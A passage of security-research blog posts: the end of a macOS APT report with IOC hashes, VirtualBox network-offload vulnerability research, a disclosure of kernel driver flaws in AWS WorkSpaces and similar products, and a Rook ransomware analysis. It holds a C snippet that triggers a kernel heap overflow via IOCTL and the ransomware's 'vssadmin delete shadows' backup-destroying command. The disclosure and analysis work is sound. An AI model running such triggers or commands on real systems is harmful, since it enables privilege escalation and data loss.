Catching APTs targeting macOS users is a rare event, and we are lucky in this instance to have a fairly transparent view of the malware being dropped. Regardless of the vector used to drop the malware, the payload itself is perfectly functional and capable of exfiltrating data and spying on macOS users. It’s just another reminder, if one were needed, that simply investing in a Mac does not guarantee you safe passage against bad actors. This may have been an APT-developed payload, but the code is simple enough for anyone interested in malfeasance to reproduce.

Indicators of Compromise

000830573ff24345d88ef7916f9745aff5ee813d; UserAgent 2021 payload, Mach-O
07f8549d2a8cc76023acee374c18bbe31bb19d91; UserAgent 2019, Mach-0
0e7b90ec564cb3b6ea080be2829b1a593fff009f; (Related) ELF DYN Shared object file
2303a9c0092f9b0ccac8536419ee48626a253f94; UserAgent 2021 installer, Mach-0
31f0642fe76b2bdf694710a0741e9a153e04b485; SafariFlashActivity1, Mach-0
734070ae052939c946d096a13bc4a78d0265a3a2; (Related) ELF DYN Shared object file
77a86a6b26a6d0f15f0cb40df62c88249ba80773; at, Mach-0
941e8f52f49aa387a315a0238cff8e043e2a7222; install_flash_player_osx.dmg, DMG
b2f0dae9f5b4f9d62b73d24f1f52dcb6d66d2f52; client, Mach-0
b6a11933b95ad1f8c2ad97afedd49a188e0587d2; SafariFlashActivity, Mach-0
c4511ad16564eabb2c179d2e36f3f1e59a3f1346; arch, Mach-0
f7549ff73f9ce9f83f8181255de7c3f24ffb2237; SafariFlashActivityInstall, shell script

File Paths


GSOh No! Hunting for Vulnerabilities in VirtualBox Network Offloads

23 November 2021 at 11:56


The Pwn2Own contest is like Christmas for me. It’s an exciting competition which involves rummaging around to find critical vulnerabilities in the most commonly used (and often the most difficult) software in the world. Back in March, I was preparing to have a pop at the Vancouver contest and had decided to take a break from writing browser fuzzers to try something different: VirtualBox.

Virtualization is an incredibly interesting target. The complexity involved in both emulating hardware devices and passing data safely to real hardware is astounding. And as the mantra goes: where there is complexity, there are bugs.

For Pwn2Own, it was a safe bet to target an emulated component. In my eyes, network hardware emulation seemed like the right (and usual) route to go. I started with a default component: the NAT emulation code in /src/VBox/Devices/Network/DrvNAT.cpp.

At the time, I just wanted to get a feel for the code, so there was no specific methodical approach to this other than scrolling through the file and reading various parts.

During my scrolling adventure, I landed on something that caught my eye:

#if 0 /* Assertion happens often to me after resuming a VM -- no time to investigate this now. */
   Assert(pThis->enmLinkState == PDMNETWORKLINKSTATE_UP);
   if (pThis->enmLinkState == PDMNETWORKLINKSTATE_UP)
       struct mbuf *m = (struct mbuf *)pSgBuf->pvAllocator;
       if (m)
            * A normal frame.
           pSgBuf->pvAllocator = NULL;
           slirp_input(pThis->pNATState, m, pSgBuf->cbUsed);
            * GSO frame, need to segment it.
           /** @todo Make the NAT engine grok large frames?  Could be more efficient... */
#if 0 /* this is for testing PDMNetGsoCarveSegmentQD. */
           uint8_t         abHdrScratch[256];
           uint8_t const  *pbFrame = (uint8_t const *)pSgBuf->aSegs[0].pvSeg;
           PCPDMNETWORKGSO pGso    = (PCPDMNETWORKGSO)pSgBuf->pvUser;
           uint32_t const  cSegs   = PDMNetGsoCalcSegmentCount(pGso, pSgBuf->cbUsed);  Assert(cSegs > 1);
           for (uint32_t iSeg = 0; iSeg pNATState, pGso->cbHdrsTotal + pGso->cbMaxSeg, &pvSeg, &cbSeg);
               if (!m)
#if 1
               uint32_t cbPayload, cbHdrs;
               uint32_t offPayload = PDMNetGsoCarveSegment(pGso, pbFrame, pSgBuf->cbUsed,
                                                           iSeg, cSegs, (uint8_t *)pvSeg, &cbHdrs, &cbPayload);
               memcpy((uint8_t *)pvSeg + cbHdrs, pbFrame + offPayload, cbPayload);
               slirp_input(pThis->pNATState, m, cbPayload + cbHdrs);

The function used for sending packets from the guest to the network contained a separate code path for Generic Segmentation Offload (GSO) frames and was using memcpy to combine pieces of data.

The next question was of course “How much of this can I control?” and after going through various code paths and writing a simple Python-based constraint solver for all the limiting factors, the answer was “More than I expected” when using the Paravirtualization Network device called VirtIO.

Paravirtualized Networking

An alternative to fully emulating a device is to use paravirtualization. Unlike full virtualization, in which the guest is entirely unaware that it is a guest, paravirtualization has the guest install drivers that are aware that they are running in a guest machine in order to work with the host to transfer data in a much faster and more efficient manner.

VirtIO is an interface that can be used to develop paravirtualized drivers. One such driver is virtio-net, which comes with the Linux source and is used for networking. VirtualBox, like a number of other virtualization software, supports this as a network adapter:

The Adapter Type options

Similarly to the e1000, VirtIO networking works by using ring buffers to transfer data between the guest and the host (In this case called Virtqueues, or VQueues). However, unlike the e1000, VirtIO doesn’t use a single ring with head and tail registers for transmitting but instead uses three separate arrays:

  • A Descriptor array that contains the following data per-descriptor:
    • Address – The physical address of the data being transferred.
    • Length – The length of data at the address.
    • Flags – Flags that determine whether the Next field is in-use and whether the buffer is read or write.
    • Next – Used when there is chaining.
  • An Available ring – An array that contains indexes into the Descriptor array that are in use and can be read by the host.
  • A Used ring – An array of indexes into the Descriptor array that have been read by the host.

This looks as so:

When the guest wishes to send packets to the network, it adds an entry to the descriptor table, adds the index of this descriptor to the Available ring, and then increments the Available Index pointer:

Once this is done, the guest ‘kicks’ the host by writing the VQueue index to the Queue Notify register. This triggers the host to begin handling descriptors in the available ring. Once a descriptor has been processed, it is added to the Used ring and the Used Index is incremented:

Generic Segmentation Offload

Next, some background on GSO is required. To understand the need for GSO, it’s important to understand the problem that it solves for network cards.

Originally the CPU would handle all of the heavy lifting when calculating transport layer checksums or segmenting them into smaller ethernet packet sizes. Since this process can be quite slow when dealing with a lot of outgoing network traffic, hardware manufacturers started implementing offloading for these operations, thus removing the strain on the operating system.

For segmentation, this meant that instead of the OS having to pass a number of much smaller packets through the network stack, the OS just passes a single packet once.

It was noticed that this optimization could be applied to other protocols (beyond TCP and UDP) without the need of hardware support by delaying segmentation until just before the network driver receives the message. This resulted in GSO being created.

Since VirtIO is a paravirtualized device, the driver is aware that it is in a guest machine and so GSO can be applied between the guest and host. GSO is implemented in VirtIO by adding a context descriptor header to the start of the network buffer. This header can be seen in the following struct:

struct VNetHdr
   uint8_t  u8Flags;
   uint8_t  u8GSOType;
   uint16_t u16HdrLen;
   uint16_t u16GSOSize;
   uint16_t u16CSumStart;
   uint16_t u16CSumOffset;

The VirtIO header can be thought of as a similar concept to the Context Descriptor in e1000.

When this header is received, the parameters are verified for some level of validity in vnetR3ReadHeader. Then the function vnetR3SetupGsoCtx is used to fill the standard GSO struct used by VirtualBox across all network devices:

typedef struct PDMNETWORKGSO
   /** The type of segmentation offloading we're performing (PDMNETWORKGSOTYPE). */
   uint8_t             u8Type;
   /** The total header size. */
   uint8_t             cbHdrsTotal;
   /** The max segment size (MSS) to apply. */
   uint16_t            cbMaxSeg;
   /** Offset of the first header (IPv4 / IPv6).  0 if not not needed. */
   uint8_t             offHdr1;
   /** Offset of the second header (TCP / UDP).  0 if not not needed. */
   uint8_t             offHdr2;
   /** The header size used for segmentation (equal to offHdr2 in UFO). */
   uint8_t             cbHdrsSeg;
   /** Unused. */
   uint8_t             u8Unused;

Once this has been constructed, the VirtIO code creates a scatter-gatherer to assemble the frame from the various descriptors:

          /* Assemble a complete frame. */
               for (unsigned int i = 1; i  0; i++)
                   unsigned int cbSegment = RT_MIN(uSize, elem.aSegsOut[i].cb);
                   PDMDevHlpPhysRead(pDevIns, elem.aSegsOut[i].addr,
                                     ((uint8_t*)pSgBuf->aSegs[0].pvSeg) + uOffset,
                   uOffset += cbSegment;
                   uSize -= cbSegment;

The frame is passed to the NAT code along with the new GSO structure, reaching the point that drew my interest originally.

Vulnerability Analysis

CVE-2021-2145 – Oracle VirtualBox NAT Integer Underflow Privilege Escalation Vulnerability

When the NAT code receives the GSO frame, it gets the full ethernet packet and passes it to Slirp (a library for TCP/IP emulation) as an mbuf message. In order to do this, VirtualBox allocates a new mbuf message and copies the packet to it. The allocation function takes a size and picks the next largest allocation size from three distinct buckets:

  1. MCLBYTES (0x800 bytes)
  2. MJUM9BYTES (0x2400 bytes)
  3. MJUM16BYTES (0x4000 bytes)
struct mbuf *slirp_ext_m_get(PNATState pData, size_t cbMin, void **ppvBuf, size_t *pcbBuf)
   struct mbuf *m;
   int size = MCLBYTES;
   LogFlowFunc(("ENTER: cbMin:%d, ppvBuf:%p, pcbBuf:%p\n", cbMin, ppvBuf, pcbBuf));
   if (cbMin 

If the supplied size is larger than MJUM16BYTES, an assertion is triggered. Unfortunately, this assertion is only compiled when the RT_STRICT macro is used, which is not the case in release builds. This means that execution will continue after this assertion is hit, resulting in a bucket size of 0x800 being selected for the allocation. Since the actual data size is larger, this results in a heap overflow when the user data is copied into the mbuf.

/** @def AssertMsgFailed
* An assertion failed print a message and a hit breakpoint.
* @param   a   printf argument list (in parenthesis).
#ifdef RT_STRICT
# define AssertMsgFailed(a)  \
   do { \
       RTAssertMsg1Weak((const char *)0, __LINE__, __FILE__, RT_GCC_EXTENSION __PRETTY_FUNCTION__); \
       RTAssertMsg2Weak a; \
       RTAssertPanic(); \
   } while (0)
# define AssertMsgFailed(a)     do { } while (0)

CVE-2021-2310 - Oracle VirtualBox NAT Heap-based Buffer Overflow Privilege Escalation Vulnerability

Throughout the code, a function called PDMNetGsoIsValid is used which verifies whether the GSO parameters supplied by the guest are valid. However, whenever it is used it is placed in an assertion. For example:

DECLINLINE(uint32_t) PDMNetGsoCalcSegmentCount(PCPDMNETWORKGSO pGso, size_t cbFrame)
   size_t cbPayload;
   Assert(PDMNetGsoIsValid(pGso, sizeof(*pGso), cbFrame));
   cbPayload = cbFrame - pGso->cbHdrsSeg;
   return (uint32_t)((cbPayload + pGso->cbMaxSeg - 1) / pGso->cbMaxSeg);

As mentioned before, assertions like these are not compiled in the release build. This results in invalid GSO parameters being allowed; a miscalculation can be caused for the size given to slirp_ext_m_get, making it less than the total copied amount by the memcpy in the for-loop. In my proof-of-concept, my parameters for the calculation of pGso->cbHdrsTotal + pGso->cbMaxSeg used for cbMin resulted in an allocation of 0x4000 bytes, but the calculation for cbPayload resulted in a memcpy call for 0x4065 bytes, overflowing the allocated region.

CVE-2021-2442 - Oracle VirtualBox NAT UDP Header Out-of-Bounds

The title of this post makes it seem like GSO is the only vulnerable offload mechanism in place here; however, another offload mechanism is vulnerable too: Checksum Offload.

Checksum offloading can be applied to various protocols that have checksums in their message headers. When emulating, VirtualBox supports this for both TCP and UDP.

In order to access this feature, the GSO frame needs to have the first bit of the u8Flags member set to indicate that the checksum offload is required. In the case of VirtualBox, this bit must always be set since it cannot handle GSO without performing the checksum offload. When VirtualBox handles UDP packets with GSO, it can end up in the function PDMNetGsoCarveSegmentQD in certain circumstances:

           if (iSeg == 0)
                                        pbSegHdrs, pbFrame, pGso->offHdr2);

The function pdmNetGsoUpdateUdpHdrUfo uses the offHdr2 to indicate where the UDP header is in the packet structure. Eventually this leads to a function called RTNetUDPChecksum:

RTDECL(uint16_t) RTNetUDPChecksum(uint32_t u32Sum, PCRTNETUDP pUdpHdr)
   bool fOdd;
   u32Sum = rtNetIPv4AddUDPChecksum(pUdpHdr, u32Sum);
   fOdd = false;
   u32Sum = rtNetIPv4AddDataChecksum(pUdpHdr + 1, RT_BE2H_U16(pUdpHdr->uh_ulen) - sizeof(*pUdpHdr), u32Sum, &fOdd);
   return rtNetIPv4FinalizeChecksum(u32Sum);

This is where the vulnerability is. In this function, the uh_ulen property is completely trusted without any validation, which results in either a size that is outside of the bounds of the buffer, or an integer underflow from the subtraction of sizeof(*pUdpHdr).

rtNetIPv4AddDataChecksum receives both the size value and the packet header pointer and proceeds to calculate the checksum:

   /* iterate the data. */
   while (cbData > 1)
       u32Sum += *pw;
       cbData -= 2;

From an exploitation perspective, adding large amounts of out of bounds data together may not seem particularly interesting. However, if the attacker is able to re-allocate the same heap location for consecutive UDP packets with the UDP size parameter being added two bytes at a time, it is possible to calculate the difference in each checksum and disclose the out of bounds data.

On top of this, it’s also possible to use this vulnerability to cause a denial-of-service against other VMs in the network:

Got another Virtualbox vuln fixed (CVE-2021-2442)

Works as both an OOB read in the host process, as well as an integer underflow. In some instances, it can also be used to remotely DoS other Virtualbox VMs!

— maxpl0it (@maxpl0it) August 1, 2021


Offload support is commonplace in modern network devices so it’s only natural that virtualization software emulating devices does it as well. While most public research has been focused on their main components, such as ring buffers, offloads don’t appear to have had as much scrutiny. Unfortunately in this case I didn’t manage to get an exploit together in time for the Pwn2Own contest, so I ended up reporting the first two to the Zero Day Initiative and the checksum bug to Oracle directly.

USB Over Ethernet | Multiple Vulnerabilities in AWS and Other Major Cloud Services

7 December 2021 at 11:00

Executive Summary

  • SentinelLabs has discovered a number of high severity flaws in driver software affecting numerous cloud services.
  • Cloud desktop solutions like Amazon Workspaces rely on third-party libraries, including Eltima SDK, to provide ‘USB over Ethernet’ capabilities that allow users to connect and share local devices like webcams. These cloud services are in use by millions of customers worldwide.
  • Vulnerabilities in Eltima SDK, derivative products, and proprietary variants are unwittingly inherited by cloud customers.
  • These vulnerabilities allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded.
  • SentinelLabs’ findings were proactively reported to the vulnerable vendors during Q2 2021 and the vulnerabilities are tracked as CVE-2021-42972, CVE-2021-42973, CVE-2021-42976, CVE-2021-42977, CVE-2021-42979, CVE-2021-42980, CVE-2021-42983, CVE-2021-42986, CVE-2021-42987, CVE-2021-42988, CVE-2021-42990, CVE-2021-42993, CVE-2021-42994, CVE-2021-42996, CVE-2021-43000, CVE-2021-43002, CVE-2021-43003, CVE-2021-43006, CVE-2021-43637, CVE-2021-43638, CVE-2021-42681, CVE-2021-42682, CVE-2021-42683, CVE-2021-42685, CVE-2021-42686, CVE-2021-42687, CVE-2021-42688.
  • Vendors have released security updates to address these vulnerabilities. Some of these are automatically applied while others require customer actions.
  • At this time, SentinelLabs has not discovered evidence of in-the-wild abuse.


Throughout 2020-2021, organizations worldwide needed to adopt new work models, including work from home (WFH), in response to the COVID-19 pandemic. This required organizations to make use of various solutions that allow WFH employees to securely access their organization’s assets and resources. As a result, the market for WFH solutions has seen tremendous growth, but security has not necessarily evolved accordingly.

In this post, we disclose details of multiple vulnerabilities we discovered in major cloud services including:

  • Amazon Nimble Studio AMI, prior to: 2021/07/29
  • Amazon NICE DCV, below: 2021.1.7744 (Windows), 2021.1.3560 (Linux), 2021.1.3590 (Mac), 2021/07/30
  • Amazon WorkSpaces agent, below: v1.0.1.1537, 2021/07/31
  • Amazon AppStream client version below: 1.1.304, 2021/08/02
  • NoMachine [all products for Windows], above v4.0.346 below v.7.7.4 (v.6.x is being updated as well)
  • Accops HyWorks Client for Windows: version v3.2.8.180 or older
  • Accops HyWorks DVM Tools for Windows: version or lower (Part of Accops HyWorks product earlier than v3.3 R3)
  • Eltima USB Network Gate below 9.2.2420 above 7.0.1370
  • Amzetta zPortal Windows zClient <= v3.2.8180.148
  • Amzetta zPortal DVM Tools <= v3.3.148.148
  • FlexiHub below 5.2.14094 (latest) above 3.3.11481
  • Donglify below 1.7.14110 (latest) above 1.0.12309

It is important to note that:

  1. These vulnerabilities originated from a library developed and provided by Eltima, which is in use by several cloud providers.
  2. Both the end user (AWS WorkSpaces client in this example) and cloud service (AWS WorkSpaces running in AWS Cloud) are vulnerable to various vulnerabilities we will discuss below. This peculiarity can be attributed to code-sharing between both the server side and client side applications.
  3. While we have confirmed these vulnerabilities for AWS, NoMachine and Accops, our testing was limited in scope to these vendors, and we believe it is highly likely other cloud providers using the same libraries would be vulnerable.
  4. Also, of the vendors tested, not all vendors were tested for both client side and server side vulnerabilities; consequently, there might also be further instances of the vulnerabilities there.

Technical Details

While these vulnerabilities affect multiple products, the technical details below will mainly focus on AWS WorkSpaces as an example. This is where our research began, and the flaws are essentially the same across all mentioned products.

Amazon WorkSpaces is a fully managed and persistent desktop virtualization service that enables users to access data, applications, and resources they need anywhere from any supported device. WorkSpaces supports provisioning Windows or Linux desktops and can be quickly scaled to provide thousands of desktops to workers across the globe.

WorkSpaces increases security by keeping data off the end user’s device and increasing reliability with the power of the AWS Cloud, an increasingly valuable service for the growing remote workforce.

WorkSpaces architecture; source: AWS

As shown above, authentication and session orchestration is done over HTTPS, while the data stream is either PCoIP (PC Over IP) or WSP (WorkSpaces Streaming Protocol), a proprietary protocol.

The main difference between them is that on Amazon WorkSpaces, only WSP supports device redirection such as smart cards and webcams. This is where the vulnerabilities reside.

The WSP protocol consists of several libraries, some of which are provided by 3rd parties. One of these is the Eltima SDK. Eltima develops a product called “USB Over Ethernet”, which enables remote USB redirection.

The same product, with some modifications, is used by Amazon WorkSpaces to enable its users to redirect USB devices to their remote desktop, allowing them to connect devices such as USB webcams to Zoom calls directly from the remote desktop.

The program is bundled with the “client” (connect to other shared devices) and the “server” (share a device over the internet):

USB Over Ethernet screenshot; source: Eltima

The drivers responsible for USB redirection are wspvuhub.sys and wspusbfilter.sys, both of which are vulnerable and seem to have been in use since the beginning of 2020, when WSP protocol was announced.

Before going through the vulnerabilities, it’s important to understand how the Windows Kernel IO Manager (IOMgr) works. When a user-mode thread sends an IRP_MJ_DEVICE_CONTROL packet, it passes input and output data between the user-mode and kernel-mode, depending on the I/O Control (IOCTL) code invoked. As per Microsoft’s documentation, “an I/O control code is a 32-bit value that consists of several fields”, as illustrated in the following figure:

Input/output Control Code Structure; source: Microsoft

For the purposes of this post, we will focus on the two least significant bits, TransferType. The documentation tells us that these bits indicate how the system will pass data between the caller of NtDeviceIoControlFile syscall and the driver that handles the IRP.

There are three ways to exchange data between kernel mode and user mode using an IRP:

  1. METHOD_BUFFERED – considered the most secure. Using this method IOMgr will copy the caller input data out of, and then into, the supplied caller output buffer.
  2. METHOD_IN/OUT_DIRECT – Depending on the data direction, the IOMgr will supply an MDL that describes a buffer, and ensures that the executing thread has read/write-access to the buffer. IOCTL routines can then lock the buffer to the memory.
  3. METHOD_NEITHER – considered more prone to faults. The IOMgr doesn’t map/validate the supplied buffer; the IOCTL handler receives a user-mode address. This is mostly used for high speed data processing.

The vulnerable IOCTL handlers, which contain several vulnerabilities and are the same across all vulnerable products, are 0x22005B and 0x22001B.

This code deals with a user buffer of type METHOD_NEITHER (Type3InputBuffer)

This means that the IOCTL handler is responsible for validating, probing, locking, and mapping the buffer itself depending on the use case.

This opens up many possibilities to exploit the device, such as double fetches, and arbitrary pointer dereference, which can lead to other vulnerabilities as well. In the image below, it can be seen that buffer verification does not exist at all in this code:

IOCTL 0x22001B Handler

Here’s a brief explanation of this code:

  1. First, the routine checks whether the calling process is 32bit or 64bit (red arrow).
  2. It then decides whether to use alloc_size_64bit or alloc_size_32bit based on the first check’s results (blue arrow) .
  3. Next, there is a call to ExAllocatePoolWithTag_wrapper with user controlled size parameter (pink arrow).
  4. At this point, the code proceeds to blocks that handle 32 bit memmove (yellow arrow) and 64 bit memmove (green arrow). As can be seen in the image, at this stage there are cases of insecure arithmetic operations on user controlled data without any overflow checks when calculating the copy size, which can lead to integer overflows that might eventually lead to arbitrary code execution.

Generally speaking, accessing (reading/writing) user-mode addresses requires probing. Dealing with Type3InputBuffer also requires you to lock the pages to the memory and only fetch data once.

The easiest way to cause an overflow in this code is by passing different parameters for the allocation and copy functions. This can be done by crafting a special IRP:

struct struct_usercontrolled {
        int gap1;
        int firstObject_handle;
        int secondObject_handle;
        int thirdObject_handle;
        int alloc_size_32bit;
        unsigned int gap2;
        unsigned int copy_size_32bit;
        unsigned int alloc_size_64bit;
        unsigned int gap3;
        unsigned int copy_size_64bit;

Where either copy_size_64bit or copy_size_32bit are greater than alloc_size_32bit or alloc_size_64bit.

Even if the copy size and allocation size were the exact same parameter, the code is still exploitable due to the fact that there are insecure arithmetic operations when calculating the memmove size parameter.

In a simplified version, to trigger this vulnerability, an attacker may send the following IOCTL (assuming running a 64bit process):

uc.alloc_size_64bit = 0x20;
uc.copy_size_64bit = 0x100;
memset(&ol, 0, sizeof(ol)); // _OVERLAPPED
ol.hEvent = EventW;
if (!DeviceIoControl(file_device_handle, 0x22001B, &uc, size, &OutBuffer, 8u, &NumberOfBytesTransferred, &ol) && (GetLastError() != ERROR_IO_PENDING || !GetOverlappedResult(file_device_handle, &ol, &NumberOfBytesTransferred, 1))) {
    exit(printf("IOCTL 0x22001B\r\n"));

This code will result in allocation of 0x20 bytes:

3: kd> r
rax=0000000000000000 rbx=ffff92889d98ad40 rcx=0000000000000001
rdx=0000000000000020 rsi=ffff92889d98a000 rdi=000000603e8ff5c8
rip=fffff80627175366 rsp=ffffde0f29eed6e0 rbp=0000000000000000
 r8=0000000000004c50  r9=fffff806271761e0 r10=fffff80627170ca0
r11=0000000000000000 r12=ffff92889962bc40 r13=0000000000000000
r14=0000000000000020 r15=ffff92889949eb38
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040246
fffff806`27175366 e899c6ffff      call    wspvuhub+0x11a04 (fffff806`27171a04)

and copying of 0x435 bytes:

3: kd> r
rax=ffffad0e69959eb0 rbx=ffff92889d98ad40 rcx=ffffad0e69959eb0
rdx=000000603e8ff5c8 rsi=ffffad0e69959eb0 rdi=000000603e8ff5c8
rip=fffff80627175420 rsp=ffffde0f29eed6e0 rbp=0000000000000000
 r8=0000000000000435  r9=00000000000001b0 r10=0000000000004c50
r11=0000000000001001 r12=ffff92889962bc40 r13=0000000000000000
r14=0000000000000020 r15=ffff92889949eb38
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040246
fffff806`27175420 e85b090000      call    wspvuhub+0x15d80 (fffff806`27175d80)

Since we control both the data and the size this makes a very strong primitive to achieve code execution in kernel mode.

BSoD Proof Of Concept

Using the DeviceTree tool from OSR, we can see that this driver accepts IOCTLs without ACL enforcements (note: Some drivers handle access to devices independently in IRP_MJ_CREATE routines):

Using DeviceTree software to examine the security descriptor of the device

This means the vulnerability can be triggered from sandboxes and might be exploitable in contexts other than just local privilege escalation. For example, it might be used as a second stage browser attack (although most modern browsers have a list of allowed IOCTLs requests) or other sandboxes for that matter.


  • Who is affected? Users with the mentioned client versions are prone to vulnerabilities that if exploited successfully may be used to gain high privileges. Since the vulnerable code exists in both the remote and local side, remote desktops are also affected by this vulnerability.
  • What is the risk? These high severity flaws could allow any user on the computer, even without privileges, to escalate privileges and run code in kernel mode. Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products. An attacker with access to an organization’s network may also gain access to execute code on unpatched systems and use this vulnerability to gain local elevation of privilege. Attackers can then leverage other techniques to pivot to the broader network, like lateral movement.


We responsibly disclosed our findings to product vendors. We are aware of the following vendor responses:

Accops has released an advisory page here.

NoMachine has released an advisory page here.

On AWS (Amazon Workspaces), a manual update needs to be performed if you either have:

  1. AutoStop WorkSpaces with maintenance turned off.
  2. AlwaysOn WorkSpaces with OS updates turned off.

In order to check your maintenance settings:

  1. Open the WorkSpaces console at
  2. In the navigation pane, choose Directories.
  3. Select your directory, and choose Actions, Update Details.
  4. Expand Maintenance Mode.

Make sure to update the client application.

While we have no evidence of in-the-wild exploitation of these vulnerabilities, we further recommend revoking any privileged credentials deployed to the platform before the cloud platforms have been patched and checking access logs for irregularities.


Vulnerabilities in third-party code have the potential to put huge numbers of products, systems, and ultimately, end users at risk, as we’ve noted before. The outsized effect of vulnerable dependency code is magnified even further when it appears in services offered by cloud providers. We urge all organizations relying on the affected services to review the recommendations above and take appropriate action.

As part of the commitment of SentinelLabs to advancing public cloud security, we actively invest in public cloud research, including advanced threat modeling and vulnerability testing of cloud platforms and related technologies. For maximum protection, we strongly recommend using SentinelOne Singularity platform.

We would like to thank those vendors that responded to our disclosure and for remediating the vulnerabilities quickly.

Disclosure Timeline


  • May 2, 2021 – Initial disclosure.
  • May 2, 2021 – First response from AWS security team.
  • May 7, 2021 – AWS security team report that they’re still actively investigating the issue.
  • May 13, 2021- AWS security team report that they’re still actively investigating the issue.
  • May 18, 2021 – AWS security team acknowledged the reported issues.
  • Jun 25, 2021 – AWS security team reported that they pushed out a fix to all regions.
  • Jul 1, 2021 – AWS security team asked for more technical details regarding the issues.
  • Jul 11, 2021 – SentinelOne answers the questions.


  • Jun 6, 2021 – Initial disclosure.
  • Jun 14, 2021 – Eltima Support first responded that they’re reviewing the report.
  • Jun 15, 2021 – Eltima Support claimed that they are aware of the vulnerabilities, but it’s resolved because the feature is turned off.
  • Jun 15, 2021- We responded that the product is still vulnerable even if the feature is turned off.
  • Jun 15, 2021 – Eltima Support responded that they discontinued using those IOCTLs due to security reasons but for backward compatibility they still keep it.
  • Jun 19, 2021 – We clarified that the vulnerable code is still reachable and exploitable.
  • Jun 29, 2021 – Eltima Support responded that their team started the work on a new build without the mentioned vulnerabilities.
  • Jul 1, 2021 – Eltima Support requests more time.
  • Sep 6, 2021- Eltima notified us that they released fixed versions for their products.


  • Jun 28, 2021 – Initial disclosure.
  • Jun 28, 2021 – Accops first responded that they’re reviewing the report.
  • Sep 5, 2021 – Accops reported that the issue is fixed and updated modules are available from Accops website and support portal for download. Customers are notified to upgrade to new versions. Fixed modules are Accops HyWorks Client for Windows version onwards and Accops HyWorks DVM Tools for Windows version onwards (part of Accops HyWorks release 3.3 R3).
  • Dec 4, 2021 – Accops has released a utility to detect vulnerable endpoints. The utility is downloadable from Accops support site.


  • We tried to contact Mechdyne several times during June 2021 to September 2021 but did not receive a response.


  • Jul 1, 2021 – Initial disclosure.
  • Jul 2, 2021 – Amzetta acknowledges the vulnerabilities and removed the product from their website.
  • Sep 3, 2021 – Amzetta notified us that they released fixed versions for their products.


  • Jun 28, 2021 – Initial disclosure.
  • Jul 5, 2021 – NoMachine acknowledges the vulnerabilities.
  • Oct 21, 2021 – NoMachine informed us that the patches are released.

New Rook Ransomware Feeds Off the Code of Babuk

23 December 2021 at 17:39

By Jim Walter and Niranjan Jayanand

First noticed on VirusTotal on November 26th by researcher Zack Allen, Rook Ransomware initially attracted attention for the operators’ rather unorthodox self-introduction, which stated that “We desperately need a lot of money” and “We will stare at the internet”.

These odd pronouncements prompted some mirth on social media, but they were followed a few days later by more serious news. On November 30th, Rook claimed its first victim: a Kazkh financial institution from which the Rook operators had stolen 1123 GB of data, according to the gang’s victim website. Further victims have been claimed since then.

In this post, we offer the first technical write up of the Rook ransomware family, covering both its main high-level features and its ties to the Babuk codebase.

Technical Details

Rook ransomware is primarily delivered via a third-party framework, for example Cobalt Strike; however, delivery via phishing email has also been reported in the wild.

Individual samples are typically UPX packed, although alternate packers/crypters have been observed such as VMProtect.

Upon execution, Rook samples pop a command window, with differing output displayed. For example, some versions show the output path for kph.sys (a component of Process Hacker), while others display inaccurate information around the use of ADS (Alternate Data Streams).

False ADS message
Rook dropping kph.sys

The ransomware attempts to terminate any process that may interfere with encryption. Interestingly, we see the kph.sys driver from Process Hacker come into play in process termination in some cases but not others. This likely reflects the attacker’s need to leverage the driver to disable certain local security solutions on specific engagements.

There are numerous process names, service names and folder names included in each sample’s configuration. For example, in sample 19CE538B2597DA454ABF835CFF676C28B8EB66F7, the following processes, services and folders are excluded from the encryption process:

Processes names skipped:


Service names terminated:


Folders names skipped:

Program Files
Program Files (x86)
Tor Browser
Internet Explorer
Opera Software

File names skipped:


As with most modern ransomware families, Rook will also attempt to delete volume shadow copies to prevent victims from restoring from backup. This is achieved via vssadmin.exe.

Rook & vssadmin.exe as seen in SentinelOne console

The following syntax is used:

vssadmin.exe delete shadows /all /quiet

Early variants of Rook were reported to have used a .TOWER extension. All current variants seen by SentinelLabs use the .ROOK extension.

.ROOK extension on affected files

In the samples we analyzed, no persistence mechanisms were observed, and after the malware runs through its execution, it cleans up by deleting itself.

Babuk Overlaps

There are a number of code similarities between Rook and Babuk. Based on the samples available so far, this appears to be an opportunistic result of the various Babuk source-code leaks we have seen over 2021, including leaks of both the compiled builders as well as the actual source. On this basis, we surmise that Rook is just the latest example of an apparent novel ransomware capitalizing on the ready availability of Babuk source-code.

Babuk and Rook use EnumDependentServicesA API to retrieve the name and status of each service that depends on the specified service before terminating. They enumerate all services in the system and stop all of those which exist in a hardcoded list in the malware. Using OpenSCManagerA API, the code gets the Service Control Manager, gets the handle and then enumerates all services in the system.

Rook enumerates all services
Rook service termination

In addition, both Rook and Babuk use the functions CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, OpenProcess, and TerminateProcess to enumerate running processes and kill any found to match those in a hardcoded list.

Babuk and Rook share the same process exclusion list

Also similar is the use of the Windows Restart Manager API to aid with process termination, which includes processes related to MS Office products and the popular gaming platform Steam.

Babuk Process termination

We also noted overlap with regards to some of the environmental checks and subsequent behaviors, including the removal of Volume Shadow Copies.

Both Babuk and Rook check if the sample is executed in a 64-bit OS, then delete the shadow volumes of the user machine. The code flows to Wow64DisableWow64FsRedirection to disable file system redirection before calling ShellExecuteW to delete shadow copies.

Babuk VSS deletion (similar to Rook)

Babuk and Rook implement similar code for enumerating local drives. Rook checks for the local drives alphabetically as shown below.

Enumerating local drives

The Rook Victim Website

Like other recent ransomware varieties, Rook embraces a dual-pronged extortion approach: an initial demand for payment to unlock encrypted files, followed by public threats via the operators’ website to leak exfiltrated data should the victim fail to comply with the ransom demand.

Rook’s welcome message (TOR-based website)

This TOR-based site is used to name victims and host any data should the victim decide not to cooperate. Rook also uses the site to openly boast of having the “latest vulnerability database” and “we can always penetrate the target system” as well as their desire for success: “We desperately need a lot of money”.

These statements appear under the heading of “why us?” and could be intended to attract affiliates as well as convince victims that they mean business.

About Rook (TOR-based website)

At the time of writing, three companies have been listed on the Rook blog, spanning different industries.

Expanded victim data


Given the economics of ransomware – high reward for low risk – and the ready availability of source code from leaks like Babuk, it’s inevitable that the proliferation of new ransomware groups we’re seeing now is only going to continue. Rook may be here today and gone tomorrow, or it could stick around until the actors behind it decide they’ve had enough (or made enough), but what is certain is that Rook won’t be the last malware we see feeding off the leaked Babuk code.

